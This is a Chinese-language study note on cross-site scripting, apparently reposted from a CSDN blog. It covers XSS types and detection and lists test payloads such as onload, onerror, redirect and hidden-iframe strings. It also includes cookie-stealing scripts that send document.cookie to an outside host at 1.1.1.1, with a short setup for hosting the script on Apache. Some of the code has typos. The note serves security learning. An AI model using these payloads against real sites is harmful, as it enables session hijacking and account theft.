网络安全 (五 XSS)

xss(挖掘闭合,绕过)-----跨站脚本-----缓冲区溢出攻击
cookie
后台地址发送给你
通过服务器的漏洞攻击客户端

----在一些交互的地方,利用有没有弹框的方法来检测有没有漏洞

xss危害:
钓鱼,窃取cookie
强制弹出广告页面,刷流量,
网页挂马,提升权限,
传播跨站脚本蠕虫

调用js代码:
标签,属性,元素,样式

alert(1); #输出语句

xss分类:
反射型(非持久)
DOM型
存储型(持久型)

反射型XSS—最常见的,主要用于将恶意的脚本附加到URL地址参数当中-------搜索栏
存储型XSS—存在数据库中,只要访问就会受到攻击----留言板

进行检测:
传个参数?x=asdaas
click

漏洞验证

<body onload=alert('xss')>

<img src='javascript:alert('xss')'>  插入图片

<a href='' onclick=alert('xss')">type</a>

<img src="http://1.1.1.1/a.jpg" onerror=alert('xss')>

<script>window.location="http://www.xxx.com"</script>   进行重定向到一个新的网站 (重定向到百度)

<iframe SRC="http://1.1.1.1/victim" height="0" width="0"></iframe>

<script>new imag().src="http://1.1.1.1/c.php?output="+document.cookie;</script>   显示cookie

<script>document.body.innerHTML="<div style=visibility:visible;><h1>THIS WEBSITE IS UNDER 			ATTACK</h1></div>";</script>

窃取cookie

a.js源码

cd /var/www/html
vim a.js
service apache2 start

var img = new image();
img.src="http://1.1.1.1/cookie.php?cookie="+document.cookie;

工具beef(相当好用的那种)

猜你喜欢

转载自blog.csdn.net/Aidang/article/details/89738323